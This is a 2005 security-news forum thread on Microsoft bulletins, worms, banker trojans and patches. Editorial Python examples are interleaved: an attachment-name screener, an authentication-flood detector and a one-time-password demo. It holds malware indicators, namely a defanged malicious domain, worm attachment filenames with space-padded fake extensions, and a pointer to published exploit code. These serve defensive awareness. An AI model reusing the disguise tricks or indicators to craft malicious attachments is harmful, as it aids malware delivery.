P.S. On a personal basis, I continue to remember friends and others affected in London in my thoughts & prayers.
-
July 12, 2005 at 1:03 pm #3185177
Microsoft Security Bulletins – July 2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Below is a summary of the July Security Bulletins. Be sure to invoke both Windows and Office Updates:
Microsoft Security Bulletins – July 2005
http://www.microsoft.com/technet/security/Bulletin/ms05-Jul.mspx
Vulnerability in Microsoft Word Could Allow Remote Code Execution (903672) CRITICAL
http://www.microsoft.com/technet/security/Bulletin/ms05-035.mspx
Vulnerability in Microsoft Color Management Module Could Allow Remote Code Execution (901214) CRITICAL
http://www.microsoft.com/technet/security/Bulletin/ms05-036.mspx
Vulnerability in JView Profiler Could Allow Remote Code Execution (903235) CRITICAL
http://www.microsoft.com/technet/security/Bulletin/ms05-037.mspx
Re-Released Bulletin: Vulnerability in Telnet Client Could Allow Information Disclosure (896428) MODERATE
http://www.microsoft.com/technet/security/Bulletin/ms05-033.mspx
-
July 12, 2005 at 5:02 pm #3185081
Mozilla Firefox 1.05 – Security Update Release
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Firefox 1.05 has been released to improve security and address past issues. So far, in early testing it’s working smoothly for me, as I use it as a complementary browser with IE 6 under XP SP2.
Firefox 1.05 Release Notes
http://www.mozilla.org/products/firefox/releases/1.0.5.html
Windows version here
http://www.mozilla.org/
FTP Site – All other builds
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/
-
July 13, 2005 at 5:03 am #3184910
Microsoft Security Bulletins – ISC Analysis of July 2005 release
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Each month the ISC provides an excellent commentary on each Microsoft security bulletin and the specific potential threats they address:
-
July 13, 2005 at 5:02 pm #3190358
Windows 2000 – Move to SP4 as SP3 support expires 6/30/2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
June 30, 2005 is the expiration date of SP3 and all corporate users should migrate workstations and servers to SP4, as the July security updates only apply to SP4 or higher.
IE team notes this here:
http://blogs.msdn.com/ie/archive/2005/05/27/422721.aspx
Service Pack Life Cycle table
http://support.microsoft.com/gp/lifesupsps
Windows Life Cycle table
http://support.microsoft.com/gp/lifewin
-
July 14, 2005 at 5:03 am #3190210
Microsoft Baseline Security Analyzer 2.0 available
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Microsoft has released version 2.0 of their free security analysis tool designed to help small and medium-sized businesses evaluate their security according to Microsoft security recommendations.
Microsoft Baseline Security Analyzer KB Article
Microsoft Baseline Security Analyzer Home Page
Microsoft Baseline Security Analyzer 2.0 FAQ
Microsoft Baseline Security Analyzer 2.0
New Features found in MBSA 2.0:
• Severity Ratings
• Locally and remotely scan for Office XP or later security updates
• Added guidance for locating updates and necessary actions
• CVE-IDs for supported updates
• Improved help content
• Windows Server Update Services compatibility
• Automatic Microsoft Update registration and agent update
• Support for detection of updates on 64-bit Windows and Windows XP Embedded
-
July 15, 2005 at 3:57 am #3188473
Windows XP SP2 vulnerability – Remote Desktop Assistant
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The remote desktop assistant should be turned off if it is not needed. You can do this by right mouse clicking on My Computer, selecting Properties, and then the Remote tab. From there you can select the option to turn off the Remote Assistant capabilities.
Windows XP SP2 vulnerability – Remote Desktop Assistant
http://isc.sans.org/diary.php?date=2005-07-14
badpack3t announced the discovery of a so far unpatched vulnerability in Windows XP SP2. The vulnerability is due to a flaw in the remote desktop assistant. This service is NOT FIREWALLED in XP SP2’s default firewall configuration.
badpack3t was able to cause a blue screen. However, there is a chance that this could be used to execute code remotely.
RDP uses port 3389 TCP. In one MSFT document, 3389 UDP is mentioned, but we could not verify that RDP listens on 3389 UDP.
Our sensors did see a slight increase in port 3389 TCP scanning starting about two weeks ago. The increase is small, and somewhat consistent with a small number of new scanners.
Other references to this issue:
http://secunia.com/advisories/16071/
https://www.immunitysec.com/pipermail/dailydave/2005-July/002185.html
-
July 15, 2005 at 7:58 am #3188402
Ideas for improving sluggish Windows performance
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
-
July 15, 2005 at 11:57 am #3188293
W32/Reatle@MM Worms – Medium Risk by F-Secure
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This new emailer/downloader/network worm is sophisticated and starting to spread. F-Secure ranks it as Medium Risk currently.
W32/Reatle@MM Worms – Medium Risk by F-Secure
http://www.f-secure.com/v-descs/lebreat.shtml
http://vil.nai.com/vil/content/v_134885.htm
This detection is for several variants of a mass-mailing worm written in MSVC, and packed with MEW. The worm bears the following characteristics:
1. Contains its own SMTP engine for mailing itself; outgoing messages have a spoofed From: address
2. Attempts to propagate to remote machines via two old exploits:
3. Attempts to download 2 other binaries. At the time of writing these are detected as W32/Generic.m, and W32/Sdbot.worm.gen.bj with the specified DATs. The worm attempts to download a binary via a URL hardcoded in its body.
4. In addition the worm opens a backdoor on TCP port 8885.
5. Administrators should block access to the following domain … Please do not go to this malicious site:
Code: h t t p : / / j 0 r . b i z
6. Attachment names in the EMAIL message
The attachment is a copy of the worm, with one of the following filenames:
Quote: account-report.exe
payment.doc (many spaces) .scr
about.doc (many spaces) .bat
help.doc (many spaces) .exe
about.cpl
archive.cpl
about.scr
archive.exe
box.bat
inbox.cpl
box.scr
inbox.exe
docs.cpl
admin.bat
docs.scr
read.cpl
readme.cpl
read.exe
readme.scr
data.scr
file.cpl
data.bat
document.cpl
doc.pif
document.exe
order.cpl
order.exe
-
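The TROJ_DONBOMB.A and W32/Reatle posts above both rely on the same attachment disguise: a harmless-looking extension (.doc, .avi) followed by a long run of spaces that pushes the real .scr/.exe/.bat extension out of the visible column of a mail client. The following is an added example, not code from the posts or from Trend Micro, F-Secure or McAfee, that screens attachment names for that trick; the extension lists and the sample names (including the .exe assumed for the DONBOMB movie file) are constructed for illustration.

```python
"""Screen e-mail attachment names for disguised executables.

Added example. Two checks: is the real (last) extension one Windows will run,
and is it preceded by a decoy extension plus a run of spaces such as
"payment.doc                    .scr"?
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Extensions Windows runs on double-click (assumption: illustrative list,
# tune it to the mail gateway's own policy).
EXECUTABLE_EXTS = {"exe", "scr", "bat", "cpl", "pif", "com", "cmd", "vbs", "hta"}
# Extensions a user reads as a document or media file.
DECOY_EXTS = {"doc", "txt", "pdf", "avi", "mpg", "jpg", "gif", "xls", "htm", "html"}

_FINAL_EXT = re.compile(r"\.([A-Za-z0-9]{1,5})$")
_DECOY_EXT = re.compile(r"\.([A-Za-z0-9]{1,5})(\s*)$")


@dataclass
class Verdict:
    name: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def inspect_attachment_name(name: str) -> Verdict:
    """Return the reasons (possibly none) a filename looks like a disguised executable."""
    verdict = Verdict(name)
    stripped = name.rstrip()            # trailing spaces never hide anything
    m = _FINAL_EXT.search(stripped)
    real_ext = m.group(1).lower() if m else ""
    base = stripped[: m.start()] if m else stripped
    if real_ext in EXECUTABLE_EXTS:
        verdict.reasons.append(f"executable extension .{real_ext}")
    # Look for a second, harmless-looking extension in front of the real one,
    # optionally separated by the run of spaces that pushes .scr off-screen.
    d = _DECOY_EXT.search(base)
    if d and real_ext and d.group(1).lower() in DECOY_EXTS:
        decoy, pad = d.group(1).lower(), d.group(2)
        verdict.reasons.append(
            f"decoy extension .{decoy} followed by {len(pad)} space(s) hides .{real_ext}"
        )
    return verdict


def screen_attachments(names: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious name to its reasons; clean names are omitted."""
    return {n: v.reasons for n in names if (v := inspect_attachment_name(n)).suspicious}


# Constructed sample set: names from the Reatle list, a DONBOMB-style padded
# media name (its real extension is an assumption), and two clean names.
SAMPLE_NAMES = [
    "account-report.exe",
    "payment.doc" + " " * 25 + ".scr",
    "about.doc" + " " * 30 + ".bat",
    "London Terror Moovie.avi" + " " * 40 + ".exe",
    "inbox.cpl",
    "quarterly-report.pdf",
    "holiday.jpg",
]

if __name__ == "__main__":
    for name, reasons in screen_attachments(SAMPLE_NAMES).items():
        print(repr(name), "->", "; ".join(reasons))
```

The check is deliberately applied to the filename inside the archive as well as the archive itself, since both worms ship the executable inside a .zip; a gateway that only inspects the outer name sees "LondonTerrorMovie.zip" and nothing more.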
July 17, 2005 at 7:57 am #3190586
Microsoft Advisory – Remote Desktop Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Microsoft Advisory – Remote Desktop Vulnerability
Microsoft has released a security advisory on the vulnerability in Remote Desktop Protocol (RDP). Their initial investigation has confirmed the DoS vulnerability. Services that utilize RDP are not enabled by default, but Remote Desktop is enabled by default on Windows XP Media Center Edition. The advisory has provided the following workarounds:
* Block TCP port 3389 at the firewall.
* Disable Terminal Services or the Remote Desktop feature if they are not required.
* Secure Remote Desktop Connections by using an IPsec policy.
* Secure Remote Desktop Connections by employing a Virtual Private Network (VPN) connection.
-
July 17, 2005 at 3:57 pm #3190545
Bagle/Beagle Worm – New Beagle.BW Variant
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Symantec is reporting a new Bagle/Beagle variant that should be closely watched.
* This virus can spread rapidly by email
* It can drop a dangerous secondary payload, which is a network based virus (esp. on unpatched and insecure systems)
* It is a highly polymorphic virus (changes subjects and attachment names randomly).
* Watch for *.ZIP attachments.
-
July 18, 2005 at 7:57 am #3190397
Privacy.Net – Security Tools Site
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Privacy.Net has a wide array of security tools and also includes some product evaluations and security articles.
-
July 18, 2005 at 7:57 am #3190398
Recent Antispyware Evaluation of top 20 products
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The link below ranks over 20 leading solutions for adware and spyware removal tools.
Reviews 2005 – Listed in order of rating
#1 Spyware Eliminator
#2 CounterSpy
#3 Spy Sweeper
#4 SpySubtract
#5 AntiSpy
#6 Spyware Doctor
#7 PestPatrol
#8 Ad-aware SE Pro
#9 Spyware BeGone
#10 McAfee AntiSpyware
#11 SpyHunter
#12 SpyRemover
#13 XoftSpy
#14 TrueWatch
#15 Spyware Stormer
#16 Maxion Spy Killer
#17 Spy Killer
#18 SpywareKilla
#19 BPS Spyware Remover
#20 Adware Remover Gold
-
July 18, 2005 at 8:00 pm #3188754
MS05-037: Trojan.Jevprox
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Trojan.Jevprox is a downloader Trojan that exploits the Microsoft Internet Explorer Javaprxy.DLL COM
Object Instantiation Heap Overflow Vulnerability (described in Microsoft Security Bulletin MS05-037).
-
July 19, 2005 at 11:57 am #3189782
Wall Street Journal – Excellent Article on Cybercrime
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The Wall Street Journal features a lengthy and excellent article on cybercrime.
-
July 19, 2005 at 2:22 pm #3189724
Phlooding – Possible New “Zero Day” Wireless Network Attack
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
As the ISC describes, these “PH” based buzzwords are getting interesting 😉
Phlooding – Possible New “Zero Day” Wireless Network Attack
AirMagnet has published a press release describing a new zero-day attack they have discovered that targets wireless networks. The press release describes an attack where several geographically dispersed systems launch a flood of authentication attempts against an IEEE 802.1x authentication server (using an EAP type such as PEAP or TTLS). This may cause the authentication server to experience performance degradation, and may cause valid user accounts to be locked out from multiple failed login attempts.
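The defender's tell for the attack described above is in the authentication server's own logs: one account failing many times within a short window from several distinct access points or sites, a pattern a user mistyping a password never produces. The following is an added example, not AirMagnet's or the ISC's code, that runs that check over constructed log lines; the one-line-per-attempt log format, the account names and the access-point names are all assumptions, and the regex would need adapting to a real RADIUS server's output.

```python
"""Spot a distributed 802.1x authentication flood in auth-server logs.

Added example. Per account, find the densest window of failed attempts and
how many distinct NAS (access points) they came from; an account failing at
lockout rate from several sites at once is a flood, not a forgetful user.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Assumed log format (constructed): one line per failed or successful attempt.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) AUTH-FAIL user=(?P<user>\S+) nas=(?P<nas>\S+)$"
)

# Constructed sample: jsmith is hammered from four sites in under a minute;
# amartin mistypes once, logs in, then mistypes again (normal behaviour).
SAMPLE_LOG = """\
2005-07-19 14:02:01 AUTH-FAIL user=jsmith nas=ap-london-01
2005-07-19 14:02:09 AUTH-FAIL user=jsmith nas=ap-berlin-02
2005-07-19 14:02:17 AUTH-FAIL user=jsmith nas=ap-tokyo-03
2005-07-19 14:02:25 AUTH-FAIL user=jsmith nas=ap-nyc-04
2005-07-19 14:02:33 AUTH-FAIL user=jsmith nas=ap-london-01
2005-07-19 14:02:41 AUTH-FAIL user=jsmith nas=ap-berlin-02
2005-07-19 14:02:49 AUTH-FAIL user=jsmith nas=ap-tokyo-03
2005-07-19 14:02:57 AUTH-FAIL user=jsmith nas=ap-nyc-04
2005-07-19 14:05:10 AUTH-FAIL user=amartin nas=ap-london-01
2005-07-19 14:05:20 AUTH-OK user=amartin nas=ap-london-01
2005-07-19 14:05:31 AUTH-FAIL user=amartin nas=ap-london-01
"""


def parse_failures(log_text: str) -> Dict[str, List[Tuple[datetime, str]]]:
    """Group failed attempts per account as (time, NAS) pairs, sorted by time."""
    events: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:                      # successes and unrelated lines are ignored
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events[m["user"]].append((ts, m["nas"]))
    for ev in events.values():
        ev.sort()
    return events


def detect_phlooding(log_text: str, window: timedelta = timedelta(minutes=2),
                     min_failures: int = 5, min_sources: int = 3) -> Dict[str, dict]:
    """Return {account: {failures, sources, distributed}} for accounts under attack.

    min_failures should match the directory's lockout threshold; min_sources
    separates a distributed flood from a single misbehaving client.
    """
    alerts: Dict[str, dict] = {}
    for user, ev in parse_failures(log_text).items():
        best = (0, 0)                  # densest window: (failures, distinct NAS)
        start = 0
        for end in range(len(ev)):
            while ev[end][0] - ev[start][0] > window:   # slide the window forward
                start += 1
            chunk = ev[start:end + 1]
            best = max(best, (len(chunk), len({nas for _, nas in chunk})))
        failures, sources = best
        if failures >= min_failures:
            alerts[user] = {"failures": failures, "sources": sources,
                            "distributed": sources >= min_sources}
    return alerts


if __name__ == "__main__":
    for account, info in detect_phlooding(SAMPLE_LOG).items():
        print(account, info)
```

A "distributed" alert is the case to treat differently from ordinary lockouts: unlocking the account by hand only feeds the flood, so the response is rate-limiting or blocking at the offending NAS entries while the account stays protected.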
-
July 20, 2005 at 6:21 am #3176121
Banker Trojan Horses – Steals banking password information
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
F-Secure is highlighting a series of stealth-like trojans that can hide on PCs and transmit keystrokes for user accounts and passwords.
Banker Trojan Horses – Steals banking password information
Banker is a family of spying trojans that try to steal information that is required to access certain on-line banks’ and on-line payment systems’ websites. Banker trojans usually steal logins, passwords, PINs, check words and other info related to logging to bank websites.
The stolen information is usually uploaded to a hacker’s website using a webform. The most vulnerable are users of on-line banks and payment systems that have logins and passwords that do not change every time a user logs on. That is why many banks are now switching to one-time passwords that expire after being used once.
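The reason the post gives for banks moving to one-time passwords is worth seeing in working form: a keylogged static password works for the attacker as often as for the user, whereas a captured one-time code is useless once the legitimate login has consumed it. The following is an added example, not F-Secure's code; the post does not say which OTP scheme banks use, so it assumes HOTP (RFC 4226), an HMAC-SHA1 counter-based code, and uses the RFC's published test secret rather than any real key.

```python
"""One-time passwords vs. captured static credentials.

Added example assuming HOTP (RFC 4226). The server-side rule that defeats a
stolen code: once a counter value has been accepted, it and every value below
it can never be accepted again.
"""
import hmac
import hashlib
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: dynamic truncation of HMAC-SHA1(secret, counter)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
              | mac[offset + 2] << 8 | mac[offset + 3])
    return str(binary % 10 ** digits).zfill(digits)


class OtpVerifier:
    """Server-side state for one token: the next counter value it will accept."""

    def __init__(self, secret: bytes, look_ahead: int = 5):
        self.secret = secret
        self.counter = 0                # lowest counter not yet consumed
        self.look_ahead = look_ahead    # tolerate codes generated but never submitted

    def verify(self, code: str) -> bool:
        for c in range(self.counter, self.counter + self.look_ahead + 1):
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.counter = c + 1    # c and everything below it is now burned
                return True
        return False


# RFC 4226 Appendix D test secret (a public test vector, not a real key).
TEST_SECRET = b"12345678901234567890"


def replay_demo() -> dict:
    """A keylogger that captures one code gets at most one login, and none at all
    if the legitimate user has already used it. Returns the outcomes."""
    server = OtpVerifier(TEST_SECRET)
    captured = hotp(TEST_SECRET, 0)
    return {
        "user_login": server.verify(captured),            # fresh code: accepted
        "replayed_login": server.verify(captured),        # same code again: rejected
        "next_code": server.verify(hotp(TEST_SECRET, 2)), # within look-ahead: accepted
        "stale_code": server.verify(hotp(TEST_SECRET, 1)),# behind the counter: rejected
    }


if __name__ == "__main__":
    print(replay_demo())
```

The look-ahead window is the usual trade-off: it lets a user who pressed the token button a few times without logging in recover, but it also bounds how many codes an attacker could pre-capture, so keep it small.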
-
July 21, 2005 at 6:21 am #3195794
phpBB 2.0.17 – New release provides security updates
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The new phpBB 2.0.17 release fixes some security issues due to XSS and provides additional new features
phpBB 2.0.17 – New release provides security updates
Tutorial for heavily moderated boards
What has changed in this release?
* Added extra checks to the deletion code in privmsg.php
* Fixed XSS issue in IE using the url BBCode
* Fixed admin activation so that you must have administrator rights to activate accounts in this mode
* Fixed get_username returning wrong row for usernames beginning with numerics
* Pass username through phpbb_clean_username within validate_username function
* Fixed PHP error in message_die function
* Fixed incorrect generation of {postrow.SEARCH_IMG} tag in viewtopic.php
* Also fixed above issue in usercp_viewprofile.php
* Fixed incorrect setting of user_level on pending members if a group is granted moderator rights
* Fixed ordering of forums on admin_ug_auth.php to be consistent with other pages
* Correctly set username on posts when deleting a user from the admin panel
-
July 21, 2005 at 10:22 am #3193881
Article: Analyzing Browser Based Vulnerability Exploitation Incidents
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This is an excellent article on the analysis of Browser Based Exploits from one of Microsoft’s experts in the field:
Analyzing Browser Based Exploitation Incidents
QUOTE: As a security researcher on the Secure Windows Initiative, I frequently analyze malicious web sites to answer the following questions:
- What vulnerabilities are being exploited?
- If known vulnerabilities are being exploited, which updates resolve the vulnerabilities?
- If malware is being installed, what is it?
-
July 21, 2005 at 12:27 pm #3193791
Sundor.A – Destructive Word Virus with Alien Greeting
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
If you open an infected Word document with the Sundor-A virus, it will display a greeting from an “alien”. It then deletes programs/documents, disables security software, and leaves compromised PCs open to further attack.
-
July 21, 2005 at 4:26 pm #3186483
VISA/AMEX cut ties with Card System Solutions after privacy leak
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
After October 2005, VISA and American Express will no longer use Card System Solutions as a processing agent due to the major privacy incidents experienced earlier this year.
VISA/AMEX cut ties with Card System Solutions after privacy leak
JULY 20, 2005 (COMPUTERWORLD) – Visa U.S.A. Inc. and American Express Co. are terminating their contracts with a credit card transaction processing company that was hit by hacker attacks, potentially exposing 40 million card numbers to online intruders.
In separate announcements, Visa and American Express said they are ending their relationships with CardSystems Solutions Inc. in Atlanta because the company didn’t meet its contractual requirements in providing processing services for merchants that accept the credit cards. The companies will no longer allow CardSystems to process their transactions after October.
-
July 22, 2005 at 8:26 am #3186237
MS05-036: Color Management Exploit Code in Wild
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Please ensure you are up-to-date on all Microsoft security bulletins as a new exploit based on the July 2005 updates has been discovered in the wild. So far, the new threat will only crash Internet Explorer, but it could be tailored into a more harmful threat that might impact unpatched systems.
ISC Warning: MS05-036: Color Management Exploit Code in Wild
Frsirt: Microsoft Color Management Module Buffer Overflow Exploit (MS05-036) — Please be careful as actual exploit code is found here
QUOTE: We’ve received reports that the Color Management Module ICC Profile Buffer Overflow Vulnerability has exploit code available and is being used out in the wild. The vulnerability information from Microsoft is available over at MS Technet. To mitigate this vulnerability, apply the appropriate patch. It appears that this version of the exploit code will only crash the browser, but it wouldn’t be difficult to put in code for execution. FrSIRT put out an advisory on the code being in the wild this morning.
-
July 22, 2005 at 12:26 pm #3185761
Windows Vista – New Official name for Longhorn
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Microsoft Press Announcement – Windows Vista
Tech Republic Article – Windows Vista
REDMOND, Wash., July 22, 2005 — Today Microsoft Corp. announced the official name of its next-generation Windows® client operating system, formerly code-named “Longhorn.” Vista’s three design goals include better security, new ways to organize information, and seamless connectivity to external devices, the company said.
-
July 22, 2005 at 8:26 pm #3185574
Microsoft Windows Vista Home Page
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
-
July 23, 2005 at 4:26 am #3194395
MySQL patches ZLIB remote security vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
A new critical security patch to address buffer overflow vulnerabilities in ZLIB library processing. This update should be processed promptly to ensure applications are properly protected.
MySQL Reference Manual :: D.2.2 Changes in release 4.1.13
Security improvement: Applied a patch that addresses a zlib data vulnerability that could result in a buffer overflow and code execution. (CAN-2005-2096) (Bug #11844)
MySQL Multiple Vulnerabilities
Secunia Advisory: SA16170
Release Date: 2005-07-22
Highly critical
Impact: DoS, System access
Where: From remote
Solution Status: Vendor Patch
Software: MySQL 4.x
-
July 23, 2005 at 8:26 am #3194355
Gael/Tenga – New Parasitic CIH-like File Infector
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Kaspersky Labs documents the first return of a classical parasitic file infector virus in about two years. Like the CIH virus, it will attempt to infect as many EXE files as possible on the PC, plus download secondary viruses which can spread rapidly throughout an unpatched network. A single PC can have hundreds or even thousands of copies of this virus as it self replicates on the PC.
Kaspersky Labs – Analyst’s Commentary
Kaspersky Labs – Tenga.A Description
Tenga is a good old classic virus, where the main goal is to self-replicate as much as possible. Once your machine is infected, you can end up with hundreds of infected files, all of which will then attempt to download Trojan-Downloader.Win32.Small.bdc
When run, the worm infects .EXE files on the local system, appending itself to host files. 10 threads are created to search for infectable computers on the Internet, SYN packets are sent to random IP addresses on TCP 139 (netbios). The worm then attempts to connect to responding systems via the IPC$ and open shares to parasitically infect files remotely.
-
July 23, 2005 at 8:26 pm #3194274
MS05-020: Trojan.Helemoo exploits IE on unpatched systems
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This new Trojan Horse takes advantage of an IE vulnerability patched by Microsoft during April 2005.
MS05-020: Trojan.Helemoo – Symantec Description
Trojan.Helemoo is a back door Trojan that exploits the Microsoft Internet Explorer DHTML Object Race Condition Memory Corruption Vulnerability (described in Microsoft Security Bulletin MS05-020).
-
July 24, 2005 at 8:26 am #3194200
US CERT – Summary Page of Current Activities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
As CERT has been a favorite resource for security news and information, this newly discovered link provides a summary of key items and is worth bookmarking:
-
July 24, 2005 at 8:26 am #3194201
New Oracle Vulnerabilities in Reporting Tools
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
US-Cert has highlighted a number of new vulnerabilities in Oracle and DBAs or system administrators should apply the latest security updates.
US-CERT Oracle Vulnerability Advisories
Red Hat Oracle Security Alerts – Published Oracle Security Alerts
19-jul-2005 – Advisory: Various Cross-Site-Scripting Vulnerabilities in Oracle Report – [Various CSS in Oracle Reports] (Not fixed after 718 days)
19-jul-2005 – Advisory: Read parts of any XML-file on the application server via Oracle Report – [Read parts of any XML file via Oracle Reports](Not fixed after 693 days)
19-jul-2005 – Advisory: Read parts of any file on the application server via Oracle Report – [Read parts of any file via Oracle Reports] (Not fixed after 692 days)
19-jul-2005 – Advisory: Overwrite any file on the application server via Oracle Report – [Overwrite files via Oracle Reports] (Not fixed after 706 days)
19-jul-2005 – Advisory: Run any OS Command via uploaded Oracle Report from any directory – [Run any OS command via Oracle Reports] (Not fixed after 663 days)
19-jul-2005 – Advisory: Run any OS Command via uploaded Oracle Forms from any directory – [Run any OS command via Oracle Forms] (Not fixed after 664 days)
-
July 25, 2005 at 4:26 pm #3193686
Bagle.BD – New Bagle variant emerges
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
A new variant of the Bagle.BD virus has just emerged and the following email messages should be blocked or avoided.
Bagle.BD Information – Trend Micro
Bagle.BD Information – Secunia
From: {Spoofed email address}
Subject: Foto
Message body: (any of the following)
• Foto
• Pass – {password of the attachment}
• Password – {password of the attachment}
• Password: {password of the attachment}
• The password is {password of the attachment}
Attachment: (any of the following)
• Foto.zip
• fotos.zip
-
July 26, 2005 at 8:26 am #3193449
Zone Alarm 6.0 Released – New Free & Licensed Versions
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
I’ve personally used Zone Alarm for years starting with the first version when the company was new. Version 6.0 has been released and I plan to update and test this new version.
Zone Alarm 6.0 – Download Center
-
July 26, 2005 at 8:26 am #3193448
SANS updates top 20 security vulnerabilities for 1st half of 2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Top Vulnerabilities to Windows Systems
- W1 Web Servers & Services
- W2 Workstation Service
- W3 Windows Remote Access Services
- W4 Microsoft SQL Server (MSSQL)
- W5 Windows Authentication
- W6 Web Browsers
- W7 File-Sharing Applications
- W8 LSAS Exposures
- W9 Mail Client
- W10 Instant Messaging
Top Vulnerabilities to UNIX Systems
- U1 BIND Domain Name System
- U2 Web Server
- U3 Authentication
- U4 Version Control Systems
- U5 Mail Transport Service
- U6 Simple Network Management Protocol (SNMP)
- U7 Open Secure Sockets Layer (SSL)
- U8 Misconfiguration of Enterprise Services NIS/NFS
- U9 Databases
- U10 Kernel
-
July 27, 2005 at 5:56 am #3194715
SPAM EMAIL – Why Unsubscribing is not a good idea
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
An excellent example of why you should never click on a URL in a spam email message.
Kaspersky Weblog: Why Unsubscribing from spam is not a good idea
QUOTE: Today I ran across an interesting piece of spam. The ending contained an offer to unsubscribe by clicking “here”. Naturally, I clicked and landed on a web page (HTML) that supposedly checked my name against a database. The page then showed me the following message: “your address has been removed from the mailing list”.
Sounds reasonable, doesn’t it? But … the end of the HTML file contains Exploit.HTML.Mht which uses the MHTML URL Processing Vulnerability to download malware: in my case it was Trojan-Dropper.Win32.Small.gr and Trojan-Spy.Win32.Banker.s.
Good reminder – never, ever unsubscribe from spam. At best you let the spammer know your address is live, and at worst you end up with an infected computer. Read more:
Malware Evolution: January to March 2005
Microsoft Security Bulletin MS04-013
-
July 27, 2005 at 5:03 pm #3195749
-
July 28, 2005 at 9:04 am #3190984
Internet Explorer 7 Beta 1 – Technology Overview
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The following link provides publicly announced information by Microsoft on the first beta release for IE 7 which will be oriented for the XP SP2 and Vista Beta platforms.
-
July 28, 2005 at 1:20 pm #3190848
Microsoft Windows Vista Beta 1 Fact Sheet
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
-
July 29, 2005 at 1:20 pm #3185913
Opera 8.02 – New version patches 3 security vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Version 8.02 of Opera addresses three security advisories as well as providing functional improvements to the browser.
Changelog for Opera 8.02 for Windows
Security Enhancements
- Solved download dialog spoofing issue described in Secunia Advisory SA15870
- Fixed image dragging issue described in Secunia Advisory SA15756
- Prevented link hijacking issue described in Secunia Advisory SA15781
Additional Enhancements
- Improved default handling of encodings in spelling checker.
- Multiple stability fixes.
- When an installed plug-in is available, use as default handler rather than display download dialog.
- Fixed issue where search.ini could be picked up from wrong location.
- Improved support for XMLHttpRequest.
- Fixed download handling when closing originating page.
-
July 29, 2005 at 5:23 pm #3182401
Downloader.Win32.VB.JL (includes Parite and Adware attacks)
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Kaspersky documents a new combined risk of a downloader, adware agent, and file infector all combined into a single attack. It’s important to be careful with email and URLs or attachments that might be in untrusted messages.
Downloader.Win32.VB.JL + Parite File Infector
http://www.viruslist.com/en/weblog?calendar=2005-07
QUOTE: A few days ago we got another Trojan-Dropper. When we analyzed it, we found out that it installs 4 files to the system. Nothing out of the ordinary for a dropper. But then we discovered that while one of the files it drops is detected as Trojan-Downloader.Win32.VB.jl, our scanner told us that the other three are infected with Virus.Win32.Parite.b
What’s all this about? Someone is trying to spread Parite? We’ve known about this virus for a number of years, and it’s still one of the most widespread classic file viruses found in the wild. But we haven’t seen it being deliberately spread for a long time.
The answer was simple, and unexpected. When we cleaned the virus from the infected files, we discovered that underneath the Parite infection, the files were infected with three other Trojan-Downloaders – WinAD.c, IstBar.is and Small.aqt, which Kaspersky Anti-Virus has detected for a long time.
